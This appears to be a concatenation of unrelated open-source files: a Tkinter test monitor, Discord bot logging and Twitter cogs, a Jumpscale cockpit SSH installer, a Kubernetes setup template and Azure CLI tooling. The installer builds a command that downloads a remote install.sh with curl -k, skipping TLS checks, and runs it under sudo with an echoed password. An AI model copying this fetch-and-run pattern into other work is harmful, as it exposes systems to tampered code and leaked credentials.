def finder_with_fixed_fileset(fileset):
"""
Module finder which always returns the
same file list.
"""
def find():
"returns the sent-in file set"
return fileset
return find
def safe_remove(path):
"removes path and ignores all exceptions."
try:
os.unlink(path)
except OSError:
pass
def run_cmdline(cmdline):
"runs a cmd and returns its output"
lst = shlex.split(cmdline)
use_shell = True if ON_WINDOWS else False
cmd = Popen(lst, stdout=PIPE, stderr=STDOUT, shell=use_shell)
output = cmd.communicate()[0]
if os.path.exists(TEMP_OUT_FILE_NAME):
output = open(TEMP_OUT_FILE_NAME).read()
os.remove(TEMP_OUT_FILE_NAME)
return output
def write_file(filename, content):
"""
Writes a string of text to a file, overwriting
any previous file with the same name.
"""
f_hand = open(filename, 'w')
f_hand.write(content)
f_hand.close()
def message_window(message):
"creates and shows a window with the message"
win = tk.Toplevel()
win.wm_attributes("-topmost", 1)
if ON_WINDOWS:
win.attributes("-toolwindow", 1)
win.title('Details')
message = message.replace('\r\n', '\n')
text = tk.Text(win)
text.insert(tk.INSERT, message)
text['state'] = tk.DISABLED
text.pack(expand=1, fill='both')
text.focus_set()
class PytddmonFrame(tk.Frame):
"The Main GUI of pytddmon"
def __init__(self, root=None, files=None, test_mode=False):
tk.Frame.__init__(self, root)
self.button = None
self.test_mode = test_mode
self.master.title("pytddmon")
self.master.resizable(0, 0)
self.create_button()
self.grid()
self.failures = 0
self.last_checksum = None # important to be different from any number
self.num_tests = 0
self.num_tests_prev = 0
self.num_tests_diff = 0
self.logger = Logger()
self.color_picker = ColorPicker()
self.runner = TestScriptRunner(run_cmdline, Analyzer(self.logger))
self.monitoring = os.getcwd()
finder = None
if files != None:
self.monitoring = ' '.join(files)
finder = finder_with_fixed_fileset(files)
else:
finder = find_test_files_recursively
self.script_writer = ScriptWriter(
finder,
write_file,
build_run_script
)
self.color_table = {
(True, 'green'): '0f0',
(False, 'green'): '0c0',
(True, 'red'): 'f00',
(False, 'red'): 'c00',
(True, 'gray'): '999',
(False, 'gray'): '555'
}
self.look_for_changes()
@staticmethod
def compute_checksum():
"returns the checksum for all the sourcefiles as a single integer."
files = find_monitored_files()
try:
files.remove(RUN_TESTS_SCRIPT_FILE)
except ValueError:
pass
return calculate_checksum(files, RealFileInfo())
def get_number_of_failures(self):
"""Returns the number of failed tests"""
self.script_writer.write_script()
(green, total) = self.runner.run(RUN_TESTS_SCRIPT_FILE)
self.num_tests_prev = self.num_tests
self.num_tests = total
return total - green
@staticmethod
def clock_string():
"Formatting the time for better readability"
return strftime("%H:%M:%S", gmtime())
def create_button(self):
"Initialize the Button label."
button_width = 8
if not ON_WINDOWS:
# Hack: Window title cut if button too small!
button_width = 10
self.button = tk.Label(self,
text='pytddmon',
width=button_width,
relief='raised',
font=("Helvetica", 16),
justify=tk.CENTER,
anchor=tk.CENTER)
self.button.bind("<Button-1>", self.button_clicked)
self.button.pack(expand=1, fill='both')
def button_clicked(self, _widget):
"Event method triggered when the button is clicked."
msg = "Monitoring: %s\n%s" % (self.monitoring, self.logger.get_log())
message_window(msg)
def get_green_and_total(self):
"""
Calculates the number of green tests and returns it together with the
total number of tests as a tuple.
"""
return (self.num_tests-self.failures, self.num_tests)
def update_gui(self):
"Calls all update methods related to the gui"
(green, total) = self.get_green_and_total()
self.update_gui_color(green, total)
self.update_gui_text(green, total)
def update_gui_color(self, green, total):
"""
Calculates the new background color and tells the GUI to switch
to it.
"""
self.color_picker.set_result( green, total )
(light, color) = self.color_picker.pick()
self.color_picker.pulse()
rgb = '#' + self.color_table[(light, color)]
self.button.configure(bg=rgb, activebackground=rgb)
self.configure(background=rgb)
def update_gui_text(self, green, total):
"Updates the text of the Main GUI."
txt = win_text(
passing_tests=green,
total_tests=total
)
self.button.configure(text=txt)
def look_for_changes(self):
"Looks for changes in source files and runs tests if needed."
newval = self.compute_checksum()
if newval != self.last_checksum:
self.last_checksum = newval
self.logger.clear()
self.logger.log('[%s] Running all tests...\n' % self.clock_string())
self.failures = self.get_number_of_failures()
self.logger.log(
'[%s] Number of failures: %d\n' % (
self.clock_string(),
self.failures
)
)
self.update_gui()
if self.test_mode:
file_h = open(TEST_MODE_LOG_FILE, "w")
(green, total) = self.get_green_and_total()
lines = [ 'green='+str(green), 'total='+str(total) ]
file_h.write('\n'.join(lines))
file_h.close()
self.master.destroy()
else:
self.after(750, self.look_for_changes)
def filter_existing_files(files):
"simple filtering function checking for existence of files"
return [f for f in files if os.path.exists(f)]
def parse_commandline():
"""
returns (files, test_mode) created from the command line arguments
passed to pytddmon.
"""
parser = optparse.OptionParser()
parser.add_option("--log-and-exit", action="store_true", default=False)
(options, args) = parser.parse_args()
return (args, options.log_and_exit)
def run():
"""
The main function: basic initialization and program start
"""
# Command line argument handling
(static_file_set, test_mode) = parse_commandline()
static_file_set = filter_existing_files(static_file_set)
# Basic tkinter initialization
root = tk.Tk()
root.wm_attributes("-topmost", 1)
if ON_WINDOWS:
root.attributes("-toolwindow", 1)
if not test_mode:
print("Minimize me!")
# Create main window
if len(static_file_set)>0:
PytddmonFrame(root, static_file_set, test_mode=test_mode)
else:
PytddmonFrame(root, test_mode=test_mode)
# Main loop
try:
root.mainloop()
except Exception as exception:
print(exception)
if __name__ == '__main__':
run()
``` |
{
"source": "0ceanlight/mcbeDiscordBot",
"score": 3
} |
#### File: mcbeDiscordBot/cogs/logs.py
```python
import discord
from discord.ext import commands
class Logs(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_message_delete(self, message):
if message.id in self.bot.messageBlacklist:
self.bot.messageBlacklist.remove(message.id)
return
if message.guild.id != 574267523869179904:
return
if message.author.color.value == 0:
color = 16777210
else:
color = message.author.color
channel = self.bot.get_channel(
int(self.bot.config[str(message.guild.id)]["logs_channel"])
)
embed = discord.Embed(
title="**Deleted Message**", color=color, timestamp=message.created_at
)
embed.add_field(name="**User**", value=message.author.mention, inline=True)
embed.add_field(name="**Channel**", value=message.channel.mention, inline=True)
embed.add_field(name="**Message**", value=message.content, inline=False)
await channel.send(embed=embed)
@commands.Cog.listener()
async def on_message_edit(self, before, after):
if before.content == after.content:
return
if after.guild.id != 574267523869179904:
return
channel = self.bot.get_channel(
int(self.bot.config[str(before.guild.id)]["logs_channel"])
)
if before.author.color.value == 0:
color = 16777210
else:
color = before.author.color
embed = discord.Embed(
title="**Edited Message**", color=color, timestamp=after.edited_at
)
embed.add_field(name="**User**", value=before.author.mention, inline=True)
embed.add_field(name="**Channel**", value=before.channel.mention, inline=True)
embed.add_field(name="**Original Message**", value=before.content, inline=False)
embed.add_field(name="**New Message**", value=after.content, inline=False)
await channel.send(embed=embed)
def setup(bot):
bot.add_cog(Logs(bot))
```
#### File: mcbeDiscordBot/cogs/twitter.py
```python
import json
import discord
import requests
import tweepy
from discord.ext import commands, tasks
class StreamListener(tweepy.StreamListener):
def __init__(self):
with open("./config.json") as f:
self.config = json.load(f)
def on_error(self, status_code: int) -> bool:
if status_code == 420:
print("Rate limit reached. ")
# returning False in on_error disconnects the stream
return False
def on_data(self, data):
data = json.loads(data)
try:
tweetUser = data["tweet"]["user"]["screen_name"]
tweetID = data["tweet"]["id_str"]
except:
tweetUser = data["user"]["screen_name"]
tweetID = data["id_str"]
tweetLink = f"https://twitter.com/{tweetUser}/status/{tweetID}"
body = {"content": tweetLink}
global config
r = requests.post(
self.config["574267523869179904"]["tweetWebhook"],
headers={"Content-Type": "application/json"},
data=json.dumps(body),
) # config['574267523869179904']['tweetWebhook'], data=json.dumps(body))
print(r.status_code)
print(r.text)
# print(json.dumps(data, indent='\t'))
class Twitter(commands.Cog):
def __init__(self, bot):
self.bot = bot
auth = tweepy.OAuthHandler(
self.bot.config["twitter"]["consumer_key"],
self.bot.config["twitter"]["consumer_secret"],
)
auth.set_access_token(
self.bot.config["twitter"]["access_token"],
self.bot.config["twitter"]["access_token_secret"],
)
api = tweepy.API(auth)
myStreamListener = StreamListener()
stream = tweepy.Stream(auth=api.auth, listener=myStreamListener)
stream.filter(follow=["1287799985040437254"], is_async=True)
def setup(bot):
bot.add_cog(Twitter(bot))
``` |
{
"source": "0-coding/python_examples",
"score": 3
} |
#### File: python_examples/source/unittest_to_io.py
```python
import unittest
class WidgetTestCase(unittest.TestCase):
def test_default_widget_size(self):
self.assertEqual((50,50), (50,50),
'incorrect default size')
def test_widget_resize(self):
self.assertEqual((100,150), (100,150),
'wrong size after resize')
def suite():
suite = unittest.TestSuite()
suite.addTest(WidgetTestCase('test_default_widget_size'))
suite.addTest(WidgetTestCase('test_widget_resize'))
return suite
if __name__ == '__main__':
from io import StringIO
stream = StringIO()
runner = unittest.TextTestRunner(stream=stream, verbosity=2)
runner.run(suite())
stream.seek(0)
print('Test output\n' + stream.read())
``` |
{
"source": "0-complexity/ays_automatic_cockpit_based_testing",
"score": 2
} |
#### File: Framework/Installer/ExecuteRemoteCommands.py
```python
from cockpit_testing.Framework.utils.utils import BaseTest
import paramiko, requests, time, subprocess, os, re
class ExecuteRemoteCommands:
def __init__(self, ip, port, username, password):
self.ip = ip
self.port = port
self.username = username
self.password = password
self.baseTest = BaseTest()
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.connect_to_virtual_machine()
self.sftp = self.ssh.open_sftp()
script_dir = os.path.dirname(__file__)
self.portal_config_source = os.path.join(script_dir, '../../production_config/portal_config_source.hrd')
self.api_config_source = os.path.join(script_dir, '../../production_config/api_config_source.toml')
self.api_config = os.path.join(script_dir, '../../production_config/api_config.toml')
self.portal_config = os.path.join(script_dir, '../../production_config/portal_config.hrd')
def connect_to_virtual_machine(self):
self.baseTest.logging.info(' [*] Connecting to the virtual machine .. ')
print(' [*] Connecting to the virtual machine .. ')
for _ in range(300):
try:
self.ssh.connect(self.ip, port=self.port, username=self.username, password=self.password)
break
except:
time.sleep(2)
self.baseTest.logging.info(' [*] Trying to connect to the virtual machine .. ')
else:
self.ssh.connect(self.ip, port=self.port, username=self.username, password=self.password)
def update_machine(self):
self.baseTest.logging.info(' [*] Updating virtual machine OS ... ')
print(' [*] Updating virtual machine OS ... ')
command = 'echo %s | sudo -S apt-get update' % self.password
self.execute_command(command=command)
def install_js(self, branch):
self.baseTest.logging.info(' [*] Creating jsInstaller file .... ')
print(' [*] Creating jsInstaller file .... ')
command = """echo 'cd $TMPDIR;\nexport JSBRANCH=%s;\ncurl -k https://raw.githubusercontent.com/Jumpscale/jumpscale_core8/$JSBRANCH/install/install.sh?$RANDOM > install.sh;\nbash install.sh;' > jsInstaller.sh""" % branch
self.execute_command(command=command)
self.baseTest.logging.info(' [*] Executing jsInstaller from %s branch .... ' % branch)
print(' [*] Executing jsInstaller .... ')
command = 'echo %s | sudo -S bash jsInstaller.sh' % self.password
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in executing jsInstaller file .... ')
print(' [*] FAIL : fail in executing jsInstaller file .... ')
# raise NameError(' [*] FAIL : fail in executing jsInstaller file .... ')
def install_cockpit(self, branch):
self.baseTest.logging.info(' [*] Creating cockpitInstaller.py file ... ')
print(' [*] Creating cockpitInstaller.py file ... ')
if branch == '8.1.0' or branch == '8.1.1':
command = """echo 'from JumpScale import j\ncuisine = j.tools.cuisine.local\ncuisine.solutions.cockpit.install_all_in_one(start=True, branch="%s", reset=True, ip="%s")' > cockpitInstaller.py""" % (
branch, self.ip)
else:
command = """echo 'from JumpScale import j\ncuisine = j.tools.cuisine.local\ncuisine.apps.portal.install()' > cockpitInstaller.py"""
self.execute_command(command=command)
self.baseTest.logging.info(' [*] Executing cockpitInstaller from %s branch ... ' % branch)
print(' [*] Executing cockpitInstaller.py file ... ')
command = 'echo %s | sudo -S jspython cockpitInstaller.py' % self.password
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in executing cockpitInstaller file .... ')
print((' [*] FAIL : fail in executing cockpitInstaller file .... '))
elif branch != '8.1.0' and branch != '8.1.1':
command = 'echo %s | sudo -S ays start' % self.password
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in running "ays start" .... ')
print(' [*] FAIL : fail in running "ays start" .... ')
def execute_command(self, command):
try:
stdin, stdout, stderr = self.ssh.exec_command(command)
tracback = stdout.readlines()
return tracback
except:
self.baseTest.logging.error(" [*] ERROR : Can't execute %s command" % command)
def check_cockpit_portal(self, cockpit_ip):
url = 'http://' + cockpit_ip
for _ in range(5):
try:
response = requests.get(url=url)
except:
time.sleep(5)
continue
else:
if response.status_code == 200:
self.baseTest.logging.info(' [*] You can access the new cockpit on : http://%s ' % self.ip)
print((' [*] You can access the new cockpit on : http://%s ' % self.ip))
return True
else:
time.sleep(5)
continue
else:
print(' [*] [X] FAIL : Please check installation files in %s vm ' % cockpit_ip)
self.baseTest.logging.error(' [*] FAIL : Please check installation files in %s vm ' % cockpit_ip)
return False
def check_branchs_values(self, branch):
self.baseTest.logging.info(' [*] Getting branches versions ... ')
print(' [*] Getting branches versions ... ')
dir = ['ays_jumpscale8', 'jscockpit', 'jumpscale_core8', 'jumpscale_portal8']
for item in dir:
command = 'cd /opt/code/github/jumpscale/%s && git branch' % item
result = self.execute_command(command=command)
if len(result) == 0:
self.baseTest.logging.error(' [*] FAIL : fail in getting %s branch .... ' % item)
print(' [*] FAIL : fail in getting %s branch version .... ' % item)
elif branch not in result[0]:
self.baseTest.logging.error(
' [*] ERROR : %s branch is not matching with %s:%s branch' % (branch, item, result))
print(' [*] ERROR : %s branch is not matching with %s:%s branch' % (branch, item, result))
else:
self.baseTest.logging.info(
' [*] OK : %s branch is matching with %s:%s branch' % (branch, item, result))
print(' [*] OK : %s branch is matching with %s:%s branch' % (branch, item, result))
def trasport_file(self, filepath):
file_name = filepath.split('/')[-1]
self.sftp.put(filepath, file_name)
def generat_production_config_files(self):
client_id = self.baseTest.values['client_id']
client_secret = self.baseTest.values['client_secret']
open("tmp", "w").writelines([l for l in open(self.portal_config_source).readlines()])
with open(self.portal_config, 'w') as portal:
with open('tmp') as tmp:
for line in tmp:
if 'param.cfg.production' in line:
portal.write('param.cfg.production = true\n')
elif 'param.cfg.client_scope' in line:
portal.write("param.cfg.client_scope = 'user:email:main,user:memberof:%s'\n" % client_id)
elif 'param.cfg.force_oauth_instance' in line:
portal.write("param.cfg.force_oauth_instance = 'itsyou.online'\n")
elif 'param.cfg.client_id' in line:
portal.write("param.cfg.client_id = '%s'\n" % client_id)
elif 'param.cfg.client_secret' in line:
portal.write("param.cfg.client_secret = '%s'\n" % client_secret)
elif 'param.cfg.redirect_url' in line:
portal.write(
"param.cfg.redirect_url = 'http://%s/restmachine/system/oauth/authorize'\n" % self.ip)
elif 'param.cfg.client_user_info_url' in line:
portal.write("param.cfg.client_user_info_url = 'https://itsyou.online/api/users/'\n")
elif 'param.cfg.token_url' in line:
portal.write("param.cfg.token_url = 'https://itsyou.online/v1/oauth/access_token'\n")
elif 'param.cfg.organization =' in line:
portal.write("param.cfg.organization = '%s'\n" % client_id)
elif 'param.cfg.oauth.default_groups' in line:
portal.write("param.cfg.oauth.default_groups = 'admin', 'user',\n")
else:
portal.write(line)
portal.close()
open("tmp", "w").writelines([l for l in open(self.api_config_source).readlines()])
with open(self.api_config, 'w') as api:
with open('tmp') as tmp:
for line in tmp:
if 'prod = false' in line:
api.write('prod = true\n')
elif 'organization = ' in line:
api.write('organization = "%s" \n' % client_id)
elif 'redirect_uri = ' in line:
api.write('redirect_uri = "http://%s/api/oauth/callback"\n' % self.ip)
elif 'client_secret =' in line:
api.write('client_secret = "%s"\n' % client_secret)
elif 'client_id = ' in line:
api.write('client_id = "%s" \n' % client_id)
elif 'jwt' in line:
api.write(
'jwt_key = "-----<KEY>"')
else:
api.write(line)
api.close()
def move_produciton_file(self):
self.baseTest.logging.info(' [*] Moving production config files .... ')
print(' [*] Moving production config files .... ')
command = 'echo %s | sudo -S mv -f /home/cloudscalers/api_config.toml /optvar/cfg/cockpit_api/config.toml' % self.password
self.execute_command(command=command)
command = 'echo %s | sudo -S mv -f /home/cloudscalers/portal_config.hrd /optvar/cfg/portals/main/config.hrd' % self.password
self.execute_command(command=command)
def restart_cockpit_services(self):
self.baseTest.logging.info(' [*] Restarting cockpit services .... ')
print(' [*] Restarting cockpit services .... ')
command = 'echo %s | sudo -S service portal restart && sudo -S service cockpit_main restart && sudo -S service cockpit_daemon_main restart' % self.password
self.execute_command(command=command)
def remove_tmp_files(self):
subprocess.call('rm %s' % self.api_config, shell=True)
subprocess.call('rm %s' % self.portal_config, shell=True)
script_dir = os.path.dirname(__file__)
subprocess.call('rm %s' % os.path.join(script_dir, '../../../tmp'), shell=True)
def production_mode(self):
self.generat_production_config_files()
self.trasport_file(self.portal_config)
self.trasport_file(self.api_config)
self.move_produciton_file()
self.restart_cockpit_services()
self.remove_tmp_files()
print(
' [*] Please, Update the callback url of ITSYOUONLINE to be http://%s/restmachine/system/oauth/authorize' % self.ip)
``` |
{
"source": "0-complexity/kubernetes",
"score": 2
} |
#### File: templates/setup/setup.py
```python
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
class Setup(TemplateBase):
version = '0.0.1'
template_name = "setup"
SSHKEY_TEMPLATE = 'github.com/openvcloud/0-templates/sshkey/0.0.1'
OVC_TEMPLATE = 'github.com/openvcloud/0-templates/openvcloud/0.0.1'
ACCOUNT_TEMPLATE = 'github.com/openvcloud/0-templates/account/0.0.1'
VDC_TEMPLATE = 'github.com/openvcloud/0-templates/vdc/0.0.1'
NODE_TEMPLATE = 'github.com/openvcloud/0-templates/node/0.0.1'
ZROBOT_TEMPLATE = 'github.com/openvcloud/0-templates/zrobot/0.0.1'
K8S_TEMPLATE = 'github.com/openvcloud/kubernetes/kubernetes/0.0.1'
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
self._config = None
def validate(self):
for key in ['vdc', 'workers', 'sshKey']:
value = self.data[key]
if not value:
raise ValueError('"%s" is required' % key)
@property
def config(self):
'''
returns an object with names of vdc, account, and ovc
'''
if self._config is not None:
return self._config
config = {
'vdc': self.data['vdc'],
}
# traverse the tree upwards so we have all the info we need to return: connection and
# account
matches = self.api.services.find(template_uid=self.VDC_TEMPLATE, name=config['vdc'])
if len(matches) != 1:
raise RuntimeError('found %d vdcs with name "%s"' % (len(matches), config['vdc']))
vdc = matches[0]
self._vdc = vdc
task = vdc.schedule_action('get_account')
task.wait()
config['account'] = task.result
matches = self.api.services.find(template_uid=self.ACCOUNT_TEMPLATE, name=config['account'])
if len(matches) != 1:
raise ValueError('found %s accounts with name "%s"' % (len(matches), config['account']))
account = matches[0]
# get connection
task = account.schedule_action('get_openvcloud')
task.wait()
config['ovc'] = task.result
self._config = config
return self._config
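# Shape of the dict cached by the property above (the names are illustrative):
#   {'vdc': 'my-vdc', 'account': 'my-account', 'ovc': 'ovc-main'}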
def _find_or_create(self, zrobot, template_uid, service_name, data):
found = zrobot.services.find(
template_uid=template_uid,
name=service_name
)
if len(found) != 0:
return found[0]
return zrobot.services.create(
template_uid=template_uid,
service_name=service_name,
data=data
)
def _ensure_helper(self):
name = '%s-little-helper' % self.name
node = self._find_or_create(
self.api,
template_uid=self.NODE_TEMPLATE,
service_name=name,
data={
'vdc': self.data['vdc'],
'sshKey': self.data['sshKey'],
'sizeId': 2,
}
)
task = node.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
return node
def _ensure_zrobot(self, helper):
name = '%s-little-bot' % self.name
bot = self._find_or_create(
self.api,
template_uid=self.ZROBOT_TEMPLATE,
service_name=name,
data={
'node': helper.name,
'port': 6600,
'templates': [
'https://github.com/openvcloud/0-templates.git',
'https://github.com/openvcloud/kubernetes.git',
],
},
)
# update data in the disk service
task = bot.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
return bot
def _mirror_services(self, zrobot):
config = self.config
ovc = j.clients.openvcloud.get(config['ovc'])
self._find_or_create(
zrobot,
template_uid=self.SSHKEY_TEMPLATE,
service_name='%s-ssh' % self.name,
data={
'passphrase': <PASSWORD>wd(20, 'ABCDEF<PASSWORD>'),
}
)
self._find_or_create(
zrobot,
template_uid=self.OVC_TEMPLATE,
service_name=config['ovc'],
data={
'address': ovc.config.data['address'],
'port': ovc.config.data['port'],
'location': ovc.config.data['location'],
'token': ovc.config.data['jwt_'],
}
)
account = self._find_or_create(
zrobot,
template_uid=self.ACCOUNT_TEMPLATE,
service_name=config['account'],
data={
'openvcloud': config['ovc'],
'create': False,
}
)
vdc = self._find_or_create(
zrobot,
template_uid=self.VDC_TEMPLATE,
service_name=config['vdc'],
data={
'account': config['account'],
'create': False,
}
)
# make sure they are installed
for instance in [account, vdc]:
task = instance.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
def _deply_k8s(self, zrobot):
k8s = self._find_or_create(
zrobot,
template_uid=self.K8S_TEMPLATE,
service_name=self.name,
data={
'workersCount': self.data['workers'],
'sizeId': self.data['sizeId'],
'dataDiskSize': self.data['dataDiskSize'],
'sshKey': '%s-ssh' % self.name,
'vdc': self.data['vdc']
}
)
task = k8s.schedule_action('install')
task.wait()
if task.state == 'error':
raise task.eco
return task.result
def install(self):
try:
self.state.check('actions', 'install', 'ok')
return
except StateCheckError:
pass
helper = self._ensure_helper()
bot = self._ensure_zrobot(helper)
zrobot = self.api.robots[bot.name]
self._mirror_services(zrobot)
self.data['credentials'] = self._deply_k8s(zrobot)
# next step, make a deployment
self.state.set('actions', 'install', 'ok')
``` |
{
"source": "0cool321/azure-cli",
"score": 2
} |
#### File: automation/release/run.py
```python
from __future__ import print_function
import argparse
import os
import tempfile
from subprocess import check_call
from .version_patcher import VersionPatcher
from ..utilities.path import get_all_module_paths
def build(pkg_path, dest):
"""
pkg_path - Full path to directory of the package to build
dest - Destination for the built package
"""
check_call(['python', 'setup.py', 'sdist', '-d', dest, 'bdist_wheel', '-d', dest], cwd=pkg_path)
def release(pkg_dir, repo):
"""Release all packages in a directory"""
pkgs = [os.path.join(pkg_dir, f) for f in os.listdir(pkg_dir)]
for pkg in pkgs:
check_call(['twine', 'register', '--repository-url', repo, '--repository', repo, pkg])
check_call(['twine', 'upload', '--repository-url', repo, '--repository', repo, pkg])
def run_build_release(component_name, repo, use_version_patch=True):
"""
component_name - The full component name (e.g. azure-cli, azure-cli-core, azure-cli-vm, etc.)
"""
for comp_name, comp_path in get_all_module_paths():
if comp_name == component_name:
pkg_dir = tempfile.mkdtemp()
patcher = VersionPatcher(use_version_patch, component_name, comp_path)
patcher.patch()
build(comp_path, pkg_dir)
patcher.unpatch()
print("Built '{}' to '{}'".format(comp_name, pkg_dir))
if repo:
release(pkg_dir, repo)
return
raise ValueError("No component found with name '{}'".format(component_name))
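# Rough usage sketch (the module path is an assumption based on this repo layout):
#   python -m automation.release.run --component azure-cli-core
#   python -m automation.release.run -c azure-cli-vm -r https://testpypi.python.org/pypi
# or, from Python, build without uploading:
#   run_build_release('azure-cli-core', repo=None)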
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Automated build and release of a component. To only build, don't specify the"
" repo parameter. The environment variables TWINE_USERNAME and TWINE_PASSWORD "
"are required if releasing.")
parser.add_argument('--component', '-c', required=True,
help='Component name (e.g. azure-cli, azure-cli-vm, etc.)')
parser.add_argument('--no-version-patch', action='store_false',
help="By default, we patch the version number of the package to remove "
"'+dev' if it exists.")
parser.add_argument('--repo', '-r',
help='Repository URL for release (e.g. https://pypi.python.org/pypi, '
'https://testpypi.python.org/pypi)')
args = parser.parse_args()
if args.repo:
assert os.environ.get('TWINE_USERNAME') and os.environ.get('TWINE_PASSWORD'), \
"Set TWINE_USERNAME and TWINE_PASSWORD environment variables to authenticate with " \
"the PyPI repository."
run_build_release(args.component,
args.repo,
args.no_version_patch)
```
#### File: batch/tests/test_batch_mgmt_commands.py
```python
import os
from azure.cli.core.test_utils.vcr_test_base import (ResourceGroupVCRTestBase, JMESPathCheck,
NoneCheck)
def _before_record_response(response):
# ignore any 401 responses during playback
if response['status']['code'] == 401:
response = None
return response
class BatchMgmtAccountScenarioTest(ResourceGroupVCRTestBase):
def tear_down(self):
rg = self.resource_group
name = self.storage_account_name
self.cmd('storage account delete -g {} -n {}'.format(rg, name))
def __init__(self, test_method):
super(BatchMgmtAccountScenarioTest, self).__init__(__file__, test_method)
self.resource_group = 'vcr_resource_group'
self.account_name = 'clibatchtest4'
self.location = 'brazilsouth'
self.storage_account_name = 'clibatchteststorage2'
def test_batch_account_mgmt(self):
self.execute()
def body(self):
rg = self.resource_group
name = self.account_name
loc = self.location
# test create storage account with default set
result = self.cmd('storage account create -g {} -n {} -l {} --sku Standard_LRS'.
format(rg, self.storage_account_name, loc),
checks=[
JMESPathCheck('name', self.storage_account_name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
sid = result['id']
# test create account with default set
self.cmd('batch account create -g {} -n {} -l {}'.format(rg, name, loc), checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
self.cmd('batch account set -g {} -n {} --storage-account-id {}'.
format(rg, name, sid),
checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
self.cmd('batch account show -g {} -n {}'.format(rg, name), checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg),
JMESPathCheck('autoStorage.storageAccountId', sid)
])
self.cmd('batch account autostorage-keys sync -g {} -n {}'.format(rg, name))
keys = self.cmd('batch account keys list -g {} -n {}'.format(rg, name), checks=[
JMESPathCheck('primary != null', True),
JMESPathCheck('secondary != null', True)
])
keys2 = self.cmd('batch account keys renew -g {} -n {} --key-name primary'.
format(rg, name),
checks=[
JMESPathCheck('primary != null', True),
JMESPathCheck('secondary', keys['secondary'])
])
self.assertTrue(keys['primary'] != keys2['primary'])
# test batch account delete
self.cmd('batch account delete -g {} -n {}'.format(rg, name))
self.cmd('batch account list -g {}'.format(rg), checks=NoneCheck())
self.cmd('batch location quotas show -l {}'.format(loc), checks=[
JMESPathCheck('accountQuota', 1)
])
class BatchMgmtApplicationScenarioTest(ResourceGroupVCRTestBase):
def set_up(self):
super(BatchMgmtApplicationScenarioTest, self).set_up()
rg = self.resource_group
sname = self.storage_account_name
name = self.account_name
loc = self.location
# test create account with default set
result = self.cmd('storage account create -g {} -n {} -l {} --sku Standard_LRS'.
format(rg, sname, loc), checks=[
JMESPathCheck('name', sname),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
self.cmd('batch account create -g {} -n {} -l {} --storage-account-id {}'.
format(rg, name, loc, result['id']), checks=[
JMESPathCheck('name', name),
JMESPathCheck('location', loc),
JMESPathCheck('resourceGroup', rg)
])
def tear_down(self):
rg = self.resource_group
sname = self.storage_account_name
name = self.account_name
self.cmd('storage account delete -g {} -n {}'.format(rg, sname))
self.cmd('batch account delete -g {} -n {}'.format(rg, name))
if os.path.exists(self.package_file_name):
os.remove(self.package_file_name)
def __init__(self, test_method):
super(BatchMgmtApplicationScenarioTest, self).__init__(__file__, test_method)
self.resource_group = 'vcr_resource_group'
self.account_name = 'clibatchtest7'
self.location = 'brazilsouth'
self.storage_account_name = 'clibatchteststorage7'
self.application_name = 'testapp'
self.application_package_name = '1.0'
self.package_file_name = os.path.join(os.getcwd(), 'samplepackage.zip')
def test_batch_application_mgmt(self):
self.execute()
def body(self):
with open(self.package_file_name, 'w') as f:
f.write('storage blob test sample file')
rg = self.resource_group
name = self.account_name
aname = self.application_name
ver = self.application_package_name
# test create application with default set
self.cmd('batch application create -g {} -n {} --application-id {} --allow-updates true'.
format(rg, name, aname), checks=[
JMESPathCheck('id', aname),
JMESPathCheck('allowUpdates', True)
])
self.cmd('batch application list -g {} -n {}'.format(rg, name), checks=[
JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].id', aname),
])
self.cmd('batch application package create -g {} -n {} --application-id {} --version {} --package-file "{}"'. #pylint: disable=line-too-long
format(rg, name, aname, ver, self.package_file_name), checks=[
JMESPathCheck('id', aname),
JMESPathCheck('storageUrl != null', True),
JMESPathCheck('version', ver),
JMESPathCheck('state', 'pending')
])
self.cmd('batch application package activate -g {} -n {} --application-id {} --version {} --format zip'.format(rg, name, aname, ver)) #pylint: disable=line-too-long
self.cmd('batch application package show -g {} -n {} --application-id {} --version {}'.
format(rg, name, aname, ver), checks=[
JMESPathCheck('id', aname),
JMESPathCheck('format', 'zip'),
JMESPathCheck('version', ver),
JMESPathCheck('state', 'active')
])
self.cmd('batch application set -g {} -n {} --application-id {} --default-version {}'.format(rg, name, aname, ver)) #pylint: disable=line-too-long
self.cmd('batch application show -g {} -n {} --application-id {}'.format(rg, name, aname),
checks=[
JMESPathCheck('id', aname),
JMESPathCheck('defaultVersion', ver),
JMESPathCheck('packages[0].format', 'zip'),
JMESPathCheck('packages[0].state', 'active')
])
# test batch application delete
self.cmd('batch application package delete -g {} -n {} --application-id {} --version {}'.
format(rg, name, aname, ver))
self.cmd('batch application delete -g {} -n {} --application-id {}'.format(rg, name, aname))
self.cmd('batch application list -g {} -n {}'.format(rg, name), checks=NoneCheck())
```
#### File: command_modules/feedback/custom.py
```python
from __future__ import print_function
import sys
from six.moves import input #pylint: disable=redefined-builtin
from azure.cli.core import __version__ as core_version
import azure.cli.core._logging as _logging
import azure.cli.command_modules.feedback._help # pylint: disable=unused-import
logger = _logging.get_az_logger(__name__)
MESSAGES = {
'intro': 'We appreciate your feedback! This survey is only two questions and should take less '\
'than a minute.',
'prompt_how_likely': '\nHow likely is it you would recommend our Azure CLI to a friend or '\
'colleague? [0 to 10]: ',
'prompt_what_changes': '\nWhat changes would we have to make for you to give us a higher '\
'rating? ',
